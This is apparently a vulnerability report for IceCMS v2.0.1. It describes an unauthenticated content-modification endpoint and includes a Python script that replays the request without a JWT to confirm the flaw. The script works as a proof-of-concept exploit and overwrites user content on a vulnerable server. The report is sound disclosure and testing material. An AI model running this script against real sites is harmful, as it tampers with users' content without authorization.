IceCMS is a standalone content management system based on Spring Boot + Vue. IceCMS v2.0.1 has an authorization flaw: in the backend /adplanet/PlanetCommentList page, the API /squareComment/ChangeSquareById/{user id}/{content} is used to modify user content. Under normal circumstances this API should only be reachable after logging in, but the server does not enforce this. Impact: an attacker can modify user content without logging in.


In the admin backend, the /adplanet/PlanetCommentList page provides a user content management function.

We open this page, capture the request, and find the API /squareComment/ChangeSquareById/{user id}/{content}, which is used to modify the user content. A successful modification returns 1.

We send this request to a request-replay module, delete its JWT token, and resend it with the content changed to hello. The server still returns 1.

Returning to the browser and refreshing the page shows the content changed to hello, confirming that the modification succeeded with no authentication at all.
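The replay step above can be turned into a repeatable check: send the same request once with the JWT and once without it, and compare the two results. If the anonymous request is answered the same way as the authenticated one (HTTP 200 with body 1), the endpoint is not enforcing login. This is an added example and not part of the original report or of IceCMS; the HTTP method (GET), the header carrying the JWT (Authorization) and the target host are assumptions that must be adjusted to match the captured request.

```python
"""Check whether ChangeSquareById can be called without the JWT.

Added example, not IceCMS code. Assumptions (adjust to the captured request):
  - the request is a GET (the path-parameter style suggests it, but verify)
  - the JWT travels in the Authorization header
  - a successful modification returns HTTP 200 with body "1"
"""
import urllib.error
import urllib.parse
import urllib.request

API_PATH = "/squareComment/ChangeSquareById"


def build_change_url(base_url, user_id, content):
    """Build the URL, percent-encoding both path segments so that content
    containing '/', spaces or '?' cannot break out of its segment."""
    uid = urllib.parse.quote(str(user_id), safe="")
    body = urllib.parse.quote(content, safe="")
    return f"{base_url.rstrip('/')}{API_PATH}/{uid}/{body}"


def send_with_urllib(method, url, headers):
    """Send one request and return (status, body). HTTP errors such as
    401/403 are returned as results, not raised, so the caller can compare them."""
    req = urllib.request.Request(url, headers=headers, method=method)
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def is_success(status, body):
    """The report states a successful modification returns 1."""
    return status == 200 and body.strip() == "1"


def check_unauthenticated_access(base_url, user_id, content, token,
                                 method="GET", token_header="Authorization",
                                 send=send_with_urllib):
    """Replay the request with and without the JWT.

    Returns a dict with both raw results and a 'vulnerable' flag that is True
    when the anonymous replay succeeds exactly like the authenticated one.
    `send` is injectable so the logic can be exercised offline."""
    url = build_change_url(base_url, user_id, content)
    authed = send(method, url, {token_header: token})
    anon = send(method, url, {})  # same request, JWT removed
    return {
        "url": url,
        "authenticated": authed,
        "anonymous": anon,
        "vulnerable": is_success(*authed) and is_success(*anon),
    }


if __name__ == "__main__":
    # Hypothetical target and token; replace with the values from your capture.
    result = check_unauthenticated_access(
        "http://127.0.0.1:8181", 1, "hello", "eyJhbGciOiJIUzI1NiJ9.example")
    print(result["url"])
    print("authenticated:", result["authenticated"])
    print("anonymous:    ", result["anonymous"])
    print("VULNERABLE" if result["vulnerable"] else "auth enforced")
```

Run it against a test instance you are allowed to modify, since a vulnerable server will actually overwrite the target user's content; a fixed build should answer the anonymous replay with 401 or 403 and leave the content untouched.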